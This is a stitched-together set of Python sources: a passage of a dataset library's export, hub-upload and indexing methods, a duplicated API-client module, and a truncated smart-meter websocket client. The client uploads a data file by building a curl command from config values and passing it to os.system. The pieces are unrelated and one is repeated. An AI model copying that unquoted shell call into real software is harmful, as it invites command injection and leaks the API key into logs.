_bytes_feature(values): """Returns a bytes_list from a list of string / byte.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=values)) def _float_feature(values): """Returns a float_list from a list of float / double.""" return tf.train.Feature(float_list=tf.train.FloatList(value=values)) def _int64_feature(values): """Returns an int64_list from a list of bool / enum / int / uint.""" return tf.train.Feature(int64_list=tf.train.Int64List(value=values)) def _feature(values: Union[float, int, str, np.ndarray]) -> "tf.train.Feature": """Typechecks `values` and returns the corresponding tf.train.Feature.""" if isinstance(values, np.ndarray): if values.dtype == np.dtype(float): return _float_feature(values) elif values.dtype == np.int64: return _int64_feature(values) elif values.dtype == np.dtype(str) or ( values.dtype == np.dtype(object) and len(values) > 0 and isinstance(values[0], str) ): return _bytes_feature([v.encode() for v in values]) else: raise ValueError( f"values={values} is an np.ndarray with items of dtype {values[0].dtype}, which cannot be serialized" ) if hasattr(values, "dtype"): if np.issubdtype(values.dtype, np.floating): return _float_feature([values.item()]) elif np.issubdtype(values.dtype, np.integer): return _int64_feature([values.item()]) elif np.issubdtype(values.dtype, np.str): return _bytes_feature([values.item().encode()]) else: raise ValueError(f"values={values} has dtype {values.dtype}, which cannot be serialized") else: raise ValueError(f"values={values} are not numpy objects, and so cannot be serialized") def serialize_example(ex): feature = {key: _feature(value) for key, value in ex.items()} example_proto = tf.train.Example(features=tf.train.Features(feature=feature)) return example_proto.SerializeToString() def tf_serialize_example(ex): tf_string = tf.py_function(serialize_example, (ex,), tf.string) return 
tf.reshape(tf_string, ()) def generator(): for ex in self: yield serialize_example(ex) if self._format_type != "numpy": raise ValueError("Dataset format must be numpy before exporting") if not filename.endswith(".tfrecord"): raise ValueError("filename {filename} must end with .tfrecord") tf_dataset = tf.data.Dataset.from_generator(generator, output_types=tf.string, output_shapes=()) writer = tf.data.experimental.TFRecordWriter(filename) logger.info(f"Writing TFRecord to {filename}") writer.write(tf_dataset) logger.info(f"Finished writing TFRecord to {filename}") self = None # delete the dataset reference used by tf_dataset def to_csv( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_csv_kwargs, ) -> int: """Exports the dataset to csv Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. to_csv_kwargs: Parameters to pass to pandas's :func:`pandas.DataFrame.to_csv` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.csv import CsvDatasetWriter return CsvDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_csv_kwargs).write() def to_dict(self, batch_size: Optional[int] = None, batched: bool = False) -> Union[dict, Iterator[dict]]: """Returns the dataset as a Python dict. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `dict` or `Iterator[dict]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pydict() else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pydict() for offset in range(0, len(self), batch_size) ) def to_json( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, num_proc: Optional[int] = None, **to_json_kwargs, ) -> int: """Export the dataset to JSON Lines or JSON. Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (:obj:`int`, optional): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. num_proc (:obj:`int`, optional): Number of processes for multiprocessing. By default it doesn't use multiprocessing. ``batch_size`` in this case defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE` but feel free to make it 5x or 10x of the default value if you have sufficient compute power. lines (:obj:`bool`, default ``True``): Whether output JSON lines format. Only possible if ``orient="records"`. 
It will throw ValueError with ``orient`` different from ``"records"``, since the others are not list-like. orient (:obj:`str`, default ``"records"``): Format of the JSON: - ``"records"``: list like ``[{column -> value}, … , {column -> value}]`` - ``"split"``: dict like ``{"index" -> [index], "columns" -> [columns], "data" -> [values]}`` - ``"index"``: dict like ``{index -> {column -> value}}`` - ``"columns"``: dict like ``{column -> {index -> value}}`` - ``"values"``: just the values array - ``"table"``: dict like ``{"schema": {schema}, "data": {data}}`` **to_json_kwargs: Parameters to pass to pandas's `pandas.DataFrame.to_json <https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.to_json.html>`_. Returns: int: The number of characters or bytes written. """ # Dynamic import to avoid circular dependency from .io.json import JsonDatasetWriter return JsonDatasetWriter(self, path_or_buf, batch_size=batch_size, num_proc=num_proc, **to_json_kwargs).write() def to_pandas( self, batch_size: Optional[int] = None, batched: bool = False ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Returns the dataset as a :class:`pandas.DataFrame`. Can also return a generator for large datasets. Args: batched (``bool``): Set to :obj:`True` to return a generator that yields the dataset as batches of ``batch_size`` rows. Defaults to :obj:`False` (returns the whole datasetas once) batch_size (Optional ``int``): The size (number of rows) of the batches if ``batched`` is `True`. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. Returns: `pandas.DataFrame` or `Iterator[pandas.DataFrame]` """ if not batched: return query_table( table=self._data, key=slice(0, len(self)), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) else: batch_size = batch_size if batch_size else config.DEFAULT_MAX_BATCH_SIZE return ( query_table( table=self._data, key=slice(offset, offset + batch_size), indices=self._indices if self._indices is not None else None, ).to_pandas(types_mapper=pandas_types_mapper) for offset in range(0, len(self), batch_size) ) def to_parquet( self, path_or_buf: Union[PathLike, BinaryIO], batch_size: Optional[int] = None, **parquet_writer_kwargs, ) -> int: """Exports the dataset to parquet Args: path_or_buf (``PathLike`` or ``FileOrBuffer``): Either a path to a file or a BinaryIO. batch_size (Optional ``int``): Size of the batch to load in memory and write at once. Defaults to :obj:`datasets.config.DEFAULT_MAX_BATCH_SIZE`. parquet_writer_kwargs: Parameters to pass to PyArrow's :class:`pyarrow.parquet.ParquetWriter` Returns: int: The number of characters or bytes written """ # Dynamic import to avoid circular dependency from .io.parquet import ParquetDatasetWriter return ParquetDatasetWriter(self, path_or_buf, batch_size=batch_size, **parquet_writer_kwargs).write() def _push_parquet_shards_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ) -> Tuple[str, str, int, int]: """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. 
split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Returns: repo_id (:obj:`str`): ID of the repository in <user>/<dataset_name>` or `<org>/<dataset_name>` format split (:obj:`str`): name of the uploaded split uploaded_size (:obj:`int`): number of uploaded bytes dataset_nbytes (:obj:`int`): approximate size in bytes of the uploaded dataset afer uncompression Example: .. code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ api = HfApi(endpoint=config.HF_ENDPOINT) token = token if token is not None else HfFolder.get_token() if token is None: raise EnvironmentError( "You need to provide a `token` or be logged in to Hugging Face with " "`huggingface-cli login`." ) if split is None: split = self.split or "train" identifier = repo_id.split("/") if len(identifier) > 2: raise ValueError( f"The identifier should be in the format <repo_id> or <namespace>/<repo_id>. It is {identifier}, " "which doesn't conform to either format." ) if len(identifier) == 2: organization, dataset_name = identifier else: dataset_name = identifier[0] organization = api.whoami(token)["name"] repo_id = f"{organization}/{dataset_name}" try: api.create_repo( dataset_name, token, repo_type="dataset", organization=organization, private=private, ) except HTTPError as err: if err.response.status_code == 409: if private is not None: logger.warning("The repository already exists: the `private` keyword argument will be ignored.") else: raise if self._indices is not None: dataset_nbytes = self.data.nbytes * len(self._indices) / len(self.data) else: dataset_nbytes = self.data.nbytes num_shards = int(dataset_nbytes / shard_size) + 1 shards = (self.shard(num_shards=num_shards, index=i, contiguous=True) for i in range(num_shards)) files = api.list_repo_files(repo_id, repo_type="dataset", revision=branch, token=token) files = [file for file in files if file.startswith("data/")] def path_in_repo(_index): return f"data/{split}-{_index:05d}-of-{num_shards:05d}.parquet" # Only delete file shards that don't currently exist. Others will be overwritten if the content is different # or will be left intact is the content is identical. 
def should_delete_file(file_name): file_to_overwrite = file_name in [path_in_repo(i) for i in range(num_shards)] file_from_same_split = file_name.startswith(f"data/{split}-") return file_from_same_split and not file_to_overwrite file_shards_to_delete = [file for file in files if should_delete_file(file)] def delete_file(file): api.delete_file(file, repo_id=repo_id, token=token, repo_type="dataset", revision=branch) if len(file_shards_to_delete): for file in utils.tqdm( file_shards_to_delete, desc="Deleting unused files from dataset repository", total=len(file_shards_to_delete), disable=bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled(), ): delete_file(file) uploaded_size = 0 for index, shard in utils.tqdm( enumerate(shards), desc="Pushing dataset shards to the dataset hub", total=num_shards, disable=bool(logging.get_verbosity() == logging.NOTSET), ): buffer = BytesIO() shard.to_parquet(buffer) uploaded_size += buffer.tell() api.upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=path_in_repo(index), repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) return repo_id, split, uploaded_size, dataset_nbytes def push_to_hub( self, repo_id: str, split: Optional[str] = None, private: Optional[bool] = False, token: Optional[str] = None, branch: Optional[str] = None, shard_size: Optional[int] = 500 << 20, ): """Pushes the dataset to the hub. The dataset is pushed using HTTP requests and does not need to have neither git or git-lfs installed. Args: repo_id (:obj:`str`): The ID of the repository to push to in the following format: `<user>/<dataset_name>` or `<org>/<dataset_name>`. Also accepts `<dataset_name>`, which will default to the namespace of the logged-in user. split (Optional, :obj:`str`): The name of the split that will be given to that dataset. Defaults to `self.split`. private (Optional :obj:`bool`, defaults to :obj:`False`): Whether the dataset repository should be set to private or not. Only affects repository creation: a repository that already exists will not be affected by that parameter. token (Optional :obj:`str`): An optional authentication token for the Hugging Face Hub. If no token is passed, will default to the token saved locally when logging in with ``huggingface-cli login``. Will raise an error if no token is passed and the user is not logged-in. branch (Optional :obj:`str`): The git branch on which to push the dataset. This defaults to the default branch as specified in your repository, which defaults to `"main"`. shard_size (Optional :obj:`int`): The size of the dataset shards to be uploaded to the hub. The dataset will be pushed in files of the size specified here, in bytes. Defaults to a shard size of 500MB. Example: .. 
code-block:: python >>> dataset.push_to_hub("<organization>/<dataset_id>", split="evaluation") """ repo_id, split, uploaded_size, dataset_nbytes = self._push_parquet_shards_to_hub( repo_id=repo_id, split=split, private=private, token=token, branch=branch, shard_size=shard_size ) organization, dataset_name = repo_id.split("/") info_to_dump = self.info.copy() info_to_dump.download_checksums = None info_to_dump.download_size = uploaded_size info_to_dump.dataset_size = dataset_nbytes info_to_dump.size_in_bytes = uploaded_size + dataset_nbytes info_to_dump.splits = { split: SplitInfo(split, num_bytes=dataset_nbytes, num_examples=len(self), dataset_name=dataset_name) } buffer = BytesIO() buffer.write(f'{{"{organization}--{dataset_name}": '.encode()) info_to_dump._dump_info(buffer) buffer.write(b"}") HfApi(endpoint=config.HF_ENDPOINT).upload_file( path_or_fileobj=buffer.getvalue(), path_in_repo=config.DATASETDICT_INFOS_FILENAME, repo_id=repo_id, token=token, repo_type="dataset", revision=branch, identical_ok=True, ) @transmit_format @fingerprint_transform(inplace=False) def add_column(self, name: str, column: Union[list, np.array], new_fingerprint: str): """Add column to Dataset. .. versionadded:: 1.7 Args: name (str): Column name. column (list or np.array): Column data to be added. Returns: :class:`Dataset` """ column_table = InMemoryTable.from_pydict({name: column}) _check_column_names(self._data.column_names + column_table.column_names) # Concatenate tables horizontally table = concat_tables([self._data, column_table], axis=1) # Update features info = self.info.copy() info.features.update(Features.from_arrow_schema(column_table.schema)) table = update_metadata_with_features(table, info.features) return Dataset(table, info=info, split=self.split, indices_table=self._indices, fingerprint=new_fingerprint) def add_faiss_index( self, column: str, index_name: Optional[str] = None, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. By default the index is done over the vectors of the specified column. You can specify :obj:`device` if you want to run it on GPU (:obj:`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: column (:obj:`str`): The column of the vectors to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. By default it corresponds to `column`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. 
dtype (data-type): The dtype of the numpy arrays that are indexed. Default is ``np.float32``. Example: .. code-block:: python ds = datasets.load_dataset('crime_and_punish', split='train') ds_with_embeddings = ds.map(lambda example: {'embeddings': embed(example['line']})) ds_with_embeddings.add_faiss_index(column='embeddings') # query scores, retrieved_examples = ds_with_embeddings.get_nearest_examples('embeddings', embed('my new query'), k=10) # save index ds_with_embeddings.save_faiss_index('embeddings', 'my_index.faiss') ds = datasets.load_dataset('crime_and_punish', split='train') # load index ds.load_faiss_index('embeddings', 'my_index.faiss') # query scores, retrieved_examples = ds.get_nearest_examples('embeddings', embed('my new query'), k=10) """ with self.formatted_as(type="numpy", columns=[column], dtype=dtype): super().add_faiss_index( column=column, index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) return self def add_faiss_index_from_external_arrays( self, external_arrays: np.array, index_name: str, device: Optional[int] = None, string_factory: Optional[str] = None, metric_type: Optional[int] = None, custom_index: Optional["faiss.Index"] = None, # noqa: F821 train_size: Optional[int] = None, faiss_verbose: bool = False, dtype=np.float32, ): """Add a dense index using Faiss for fast retrieval. The index is created using the vectors of `external_arrays`. You can specify `device` if you want to run it on GPU (`device` must be the GPU index). You can find more information about Faiss here: - For `string factory <https://github.com/facebookresearch/faiss/wiki/The-index-factory>`__ Args: external_arrays (:obj:`np.array`): If you want to use arrays from outside the lib for the index, you can set :obj:`external_arrays`. It will use :obj:`external_arrays` to create the Faiss index instead of the arrays in the given :obj:`column`. index_name (:obj:`str`): The index_name/identifier of the index. This is the index_name that is used to call :func:`datasets.Dataset.get_nearest_examples` or :func:`datasets.Dataset.search`. device (Optional :obj:`int`): If not None, this is the index of the GPU to use. By default it uses the CPU. string_factory (Optional :obj:`str`): This is passed to the index factory of Faiss to create the index. Default index class is ``IndexFlat``. metric_type (Optional :obj:`int`): Type of metric. Ex: faiss.faiss.METRIC_INNER_PRODUCT or faiss.METRIC_L2. custom_index (Optional :obj:`faiss.Index`): Custom Faiss index that you already have instantiated and configured for your needs. train_size (Optional :obj:`int`): If the index needs a training step, specifies how many vectors will be used to train the index. faiss_verbose (:obj:`bool`, defaults to False): Enable the verbosity of the Faiss index. dtype (:obj:`numpy.dtype`): The dtype of the numpy arrays that are indexed. Default is np.float32. 
""" super().add_faiss_index_from_external_arrays( external_arrays=external_arrays.astype(dtype), index_name=index_name, device=device, string_factory=string_factory, metric_type=metric_type, custom_index=custom_index, train_size=train_size, faiss_verbose=faiss_verbose, ) def add_elasticsearch_index( self, column: str, index_name: Optional[str] = None, host: Optional[str] = None, port: Optional[int] = None, es_client: Optional["elasticsearch.Elasticsearch"] = None, # noqa: F821 es_index_name: Optional[str] = None, es_index_config: Optional[dict] = None, ): """Add a text index using ElasticSearch for fast retrieval. This is done in-place. Args: column (:obj:`str`): The column of the documents to add to the index. index_name (Optional :obj:`str`): The index_name/identifier of the index. This is the index name that is used to call :meth:`Dataset.get_nearest_examples` or :meth:`Dataset.search`. By default it corresponds to :obj:`column`. host (Optional :obj:`str`, defaults to localhost): host of where ElasticSearch is running port (Optional :obj:`str`, defaults to 9200): port of where ElasticSearch is running es_client (Optional :obj:`elasticsearch.Elasticsearch`): The elasticsearch client used to create the index if host and port are None. es_index_name (Optional :obj:`str`): The elasticsearch index name used to create the index. es_index_config (Optional :obj:`dict`): The configuration of the elasticsearch index. Default config is:: { "settings": { "number_of_shards": 1, "analysis": {"analyzer": {"stop_standard": {"type": "standard", " stopwords": "_english_"}}}, }, "mappings": { "properties": { "text": { "type": "text", "analyzer": "standard", "similarity": "BM25" }, } }, } Example: .. code-block:: python es_client = elasticsearch.Elasticsearch() ds = datasets.load_dataset('crime_and_punish', split='train') ds.add_elasticsearch_index(column='line', es_client=es_client, es_index_name="my_es_index") scores, retrieved_examples = ds.get_nearest_examples('line', 'my new query', k=10) """ with self.formatted_as(type=None, columns=[column]): super().add_elasticsearch_index( column=column, index_name=index_name, host=host, port=port, es_client=es_client, es_index_name=es_index_name, es_index_config=es_index_config, ) return self @transmit_format @fingerprint_transform(inplace=False) def add_item(self, item: dict, new_fingerprint: str): """Add item to Dataset. .. versionadded:: 1.7 Args: item (dict): Item data to be added. 
Returns: :class:`Dataset` """ item_table = InMemoryTable.from_pydict({k: [v] for k, v in item.items()}) # We don't call _check_if_features_can_be_aligned here so this cast is "unsafe" dset_features, item_features = _align_features([self.features, Features.from_arrow_schema(item_table.schema)]) # Cast to align the schemas of the tables and concatenate the tables table = concat_tables( [ self._data.cast(pa.schema(dset_features.type)) if self.features != dset_features else self._data, item_table.cast(pa.schema(item_features.type)), ] ) if self._indices is None: indices_table = None else: item_indices_array = pa.array([len(self._data)], type=pa.uint64()) item_indices_table = InMemoryTable.from_arrays([item_indices_array], names=["indices"]) indices_table = concat_tables([self._indices, item_indices_table]) info = self.info.copy() info.features.update(item_features) table = update_metadata_with_features(table, info.features) return Dataset( table, info=info, split=self.split, indices_table=indices_table, fingerprint=new_fingerprint, ) def align_labels_with_mapping(self, label2id: Dict, label_column: str) -> "Dataset": """Align the dataset's label ID and label name mapping to match an input :obj:`label2id` mapping. This is useful when you want to ensure that a model's predicted labels are aligned with the dataset. The alignment in done using the lowercase label names. Args: label2id (:obj:`dict`): The label name to ID mapping to align the dataset with. label_column (:obj:`str`): The column name of labels to align on. Example: .. code-block:: python # dataset with mapping {'entailment': 0, 'neutral': 1, 'contradiction': 2} ds = load_dataset("glue", "mnli", split="train") # mapping to align with label2id = {'CONTRADICTION': 0, 'NEUTRAL': 1, 'ENTAILMENT': 2} ds_aligned = ds.align_labels_with_mapping(label2id, "label") """ # Sanity checks if label_column not in self._data.column_names: raise ValueError(f"Column ({label_column}) not in table columns ({self._data.column_names}).") label_feature = self.features[label_column] if not isinstance(label_feature, ClassLabel): raise ValueError( f"Aligning labels with a mapping is only supported for {ClassLabel.__name__} column, and column {label_feature} is {type(label_feature).__name__}." ) # Sort input mapping by ID value to ensure the label names are aligned label2id = dict(sorted(label2id.items(), key=lambda item: item[1])) label_names = list(label2id.keys()) # Some label mappings use uppercase label names so we lowercase them during alignment label2id = {k.lower(): v for k, v in label2id.items()} int2str_function = label_feature.int2str def process_label_ids(batch): dset_label_names = [ int2str_function(label_id).lower() if label_id is not None else None for label_id in batch[label_column] ] batch[label_column] = [ label2id[label_name] if label_name is not None else None for label_name in dset_label_names ] return batch features = self.features.copy() features[label_column] = ClassLabel(num_classes=len(label_names), names=label_names) return self.map(process_label_ids, features=features, batched=True, desc="Aligning the labels") def concatenate_datasets( dsets: List[Dataset], info: Optional[Any] = None, split: Optional[Any] = None, axis: int = 0, ): """ Converts a list of :class:`Dataset` with the same schema into a single :class:`Dataset`. Args: dsets (:obj:`List[datasets.Dataset]`): List of Datasets to concatenate. info (:class:`DatasetInfo`, optional): Dataset information, like description, citation, etc. 
split (:class:`NamedSplit`, optional): Name of the dataset split. axis (``{0, 1}``, default ``0``, meaning over rows): Axis to concatenate over, where ``0`` means over rows (vertically) and ``1`` means over columns (horizontally). .. versionadded:: 1.6.0 """ # Ignore datasets with no rows if any(dset.num_rows > 0 for dset in dsets): dsets = [dset for dset in dsets if dset.num_rows > 0] else: # Return first dataset if all datasets are empty return dsets[0] # Perform checks (and a potentional cast if axis=0) if axis == 0: _check_if_features_can_be_aligned([dset.features for dset in dsets]) else: if not all([dset.num_rows == dsets[0].num_rows for dset in dsets]): raise ValueError("Number of rows must match for all datasets") _check_column_names([col_name for dset in dsets for col_name in dset._data.column_names]) # Find common format or reset format format = dsets[0].format if any(dset.format != format for dset in dsets): format = {} logger.info("Some of the datasets have disparate format. Resetting the format of the concatenated dataset.") def apply_offset_to_indices_table(table, offset): if offset == 0: return table else: array = table["indices"] new_array = pc.add(array, pa.scalar(offset, type=pa.uint64())) return InMemoryTable.from_arrays([new_array], names=["indices"]) # Concatenate indices if they exist if any(dset._indices is not None for dset in dsets): if axis == 0: # Datasets with no indices tables are replaced with a dataset with an indices table in memory. # Applying an offset to an indices table also brings the table in memory. indices_tables = [] for i in range(len(dsets)): if dsets[i]._indices is None: dsets[i] = dsets[i].select(range(len(dsets[i]))) indices_tables.append(dsets[i]._indices) # An offset needs to be applied to the indices before concatenating offset = 0 for i in range(len(dsets)): indices_tables[i] = apply_offset_to_indices_table(indices_tables[i], offset) offset += len(dsets[i]._data) # Concatenate indices indices_tables = [t for t in indices_tables if len(t) > 0] if indices_tables: indices_table = concat_tables(indices_tables) else: indices_table = InMemoryTable.from_batches([], schema=pa.schema({"indices": pa.int64()})) else: if len(dsets) == 1: indices_table = dsets[0]._indices else: for i in range(len(dsets)): dsets[i] = dsets[i].flatten_indices() indices_table = None else: indices_table = None table = concat_tables([dset._data for dset in dsets], axis=axis) if axis == 0: features_list = _align_features([dset.features for dset in dsets]) else: features_list = [dset.features for dset in dsets] table = update_metadata_with_features(table, {k: v for features in features_list for k, v in features.items()}) # Concatenate infos if info is None: info = DatasetInfo.from_merge([dset.info for dset in dsets]) fingerprint = update_fingerprint( "".join(dset._fingerprint for dset in dsets), concatenate_datasets, {"info": info, "split": split} ) # Make final concatenated dataset concatenated_dataset = Dataset( table, info=info, split=split, indices_table=indices_table, fingerprint=fingerprint, ) concatenated_dataset.set_format(**format) return concatenated_dataset # This is outside Dataset.filter as it needs to be picklable for multiprocessing def get_indices_from_mask_function( function: Callable, batched: bool, with_indices: bool, input_columns: Optional[Union[str, List[str]]], indices_mapping: Optional[Table] = None, *args, **fn_kwargs, ): if batched: # we extract indices from args *inputs, indices = args if with_indices: mask = function(*inputs, indices, **fn_kwargs) 
else: mask = function(*inputs, **fn_kwargs) else: # we get batched data (to do less look-ups) but `function` only accepts one example # therefore we need to call `function` on each example of the batch to get the mask *inputs, indices = args mask = [] if input_columns is None: # inputs only contains a batch of examples batch: dict = inputs[0] num_examples = len(batch[next(iter(batch.keys()))]) for i in range(num_examples): example = {key: batch[key][i] for key in batch} mask.append( function(example, indices[i], **fn_kwargs) if with_indices else function(example, **fn_kwargs) ) else: # inputs is a list of columns columns: List[List[Any]] = inputs num_examples = len(columns[0]) for i in range(num_examples): input = [column[i] for column in columns] mask.append( function(*input, indices[i], **fn_kwargs) if with_indices else function(*input, **fn_kwargs) ) indices_array = [i for i, to_keep in zip(indices, mask) if to_keep] if indices_mapping is not None: indices_array = pa.array(indices_array, type=pa.uint64()) indices_array = indices_mapping.column(0).take(indices_array) indices_array = indices_array.to_pylist() return {"indices": indices_array}
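# --- Hedged usage sketch (not part of the library source above) ---------------------------
# A small, self-contained walk through the transforms documented in the preceding chunk:
# shuffle, train_test_split, shard, the export helpers and the row/column additions.
# All column names and values below are illustrative placeholders.
from datasets import Dataset, concatenate_datasets

ds = Dataset.from_dict({"text": [f"example {i}" for i in range(8)], "label": [i % 2 for i in range(8)]})

shuffled = ds.shuffle(seed=42)                           # reproducible permutation of the rows
splits = ds.train_test_split(test_size=0.25, seed=42)    # DatasetDict with "train" and "test"
print(len(splits["train"]), len(splits["test"]))         # 6 2

first_shard = ds.shard(num_shards=4, index=0)            # keeps rows whose index % 4 == 0

# Contiguous shards concatenate back in the original order, as the shard docstring states.
restored = concatenate_datasets([ds.shard(num_shards=4, index=i, contiguous=True) for i in range(4)])
assert restored["text"] == ds["text"]

ds.to_csv("example.csv")        # export helpers documented above
ds.to_json("example.jsonl")
df = ds.to_pandas()

ds2 = ds.add_column("length", [len(t) for t in ds["text"]])          # new column
ds3 = ds2.add_item({"text": "a new row", "label": 0, "length": 9})   # new row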
import os from functools import lru_cache from typing import Any, Dict, Optional from dotenv import load_dotenv from requests import Session load_dotenv() hyperion_base_url = f"{os.getenv('HYPERION_ENDPOINT')}/api/v1" hyperion_session = Session() hyperion_session.headers.update( { "Authorization": f"Bearer {os.getenv('HYPERION_INTEGRATION_TOKEN')}", } ) currency_details = hyperion_session.get( f"{hyperion_base_url}/integration/currency" ).json() @lru_cache() def resolve_account_id(account_id: str) -> Optional[Dict[str, Any]]: account_resp = hyperion_session.get(f"{hyperion_base_url}/accounts/{account_id}") if account_resp.status_code == 404: return None return account_resp.json()
import os from functools import lru_cache from typing import Any, Dict, Optional from dotenv import load_dotenv from requests import Session load_dotenv() hyperion_base_url = f"{os.getenv('HYPERION_ENDPOINT')}/api/v1" hyperion_session = Session() hyperion_session.headers.update( { "Authorization": f"Bearer {os.getenv('HYPERION_INTEGRATION_TOKEN')}", } ) currency_details = hyperion_session.get( f"{hyperion_base_url}/integration/currency" ).json() @lru_cache() def resolve_account_id(account_id: str) -> Optional[Dict[str, Any]]: account_resp = hyperion_session.get(f"{hyperion_base_url}/accounts/{account_id}") if account_resp.status_code == 404: return None return account_resp.json()
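# --- Hedged usage note for the module above -------------------------------------------------
# resolve_account_id is wrapped in functools.lru_cache, so repeated lookups for the same id
# hit the Hyperion API only once per process; cache_info() and cache_clear() are the standard
# functools hooks for inspecting and invalidating that cache. The account id is a placeholder.
first = resolve_account_id("acc-123")    # performs the HTTP GET
second = resolve_account_id("acc-123")   # served from the in-process cache, no request
print(resolve_account_id.cache_info())   # hits=1, misses=1 after the two calls above
resolve_account_id.cache_clear()         # force a fresh lookup on the next call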
#!/usr/bin/env python3 from logger import logger import asyncio import websockets import json from pathlib import Path import datetime import os RootDir = '/home/pi/chain2gate' DeviceId = 'c2g-XXXXXXXXX' ServerIP = 'XXX.XXX.XXX.XXX' ApiKey = 'API_KEY' def configure(): global DeviceId, RootDir, ServerIP, ApiKey with open(f"{RootDir}/settings.json", 'r') as jsonfile: settings = json.load(jsonfile) DeviceId = settings.get('DeviceId') ServerIP = settings.get('ServerIP') ApiKey = settings.get('ApiKey') def trim_dict(d): emax = max(d['epoch']) emin = min([e for e in d['epoch'] if e > emax - 60*60*24]) imin = d['epoch'].index(emin) d['epoch'] = d['epoch'][imin:] d['meter'] = d['meter'][imin:] d['type'] = d['type'][imin:] d['energy'] = d['energy'][imin:] d['power'] = d['power'][imin:] def load_json(): try: with open(f"{RootDir}/{DeviceId}.json", 'r') as jsonfile: d = json.load(jsonfile) except: d = { 'epoch': [], 'meter': [], 'type': [], 'energy': [], 'power': [] } return d def save_json(d): with open(f"{RootDir}/{DeviceId}.json", 'w') as jsonfile: json.dump(d, jsonfile) def upload(date=None): c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' if date is not None: c = f'curl -X PUT "http://{ServerIP}/api/chain2gate/{DeviceId}?api_key={ApiKey}&date={date}" -H "accept: application/json" -H "Content-Type: multipart/form-data" -F "file=@{RootDir}/{DeviceId}.json;type=text/plain" > /dev/null 2>&1' logger.debug(f'Uploading: {c}') os.system(c) async def chain2client(): while True: # outer loop restarted every time the connection fails uri = f"ws://{DeviceId}.local:81" logger.debug(f'uri: {uri}') logger.debug('Reading data json file.') d = load_json() logger.debug('Read.') last_upload = datetime.datetime.now() try: async with websockets.connect(uri) as websocket: logger.info('Client started.') async for message in websocket: logger.debug('Message received.') msg = json.loads(message) now = datetime.datetime.now() if 'Chain2Data' in msg: logger.info(msg) 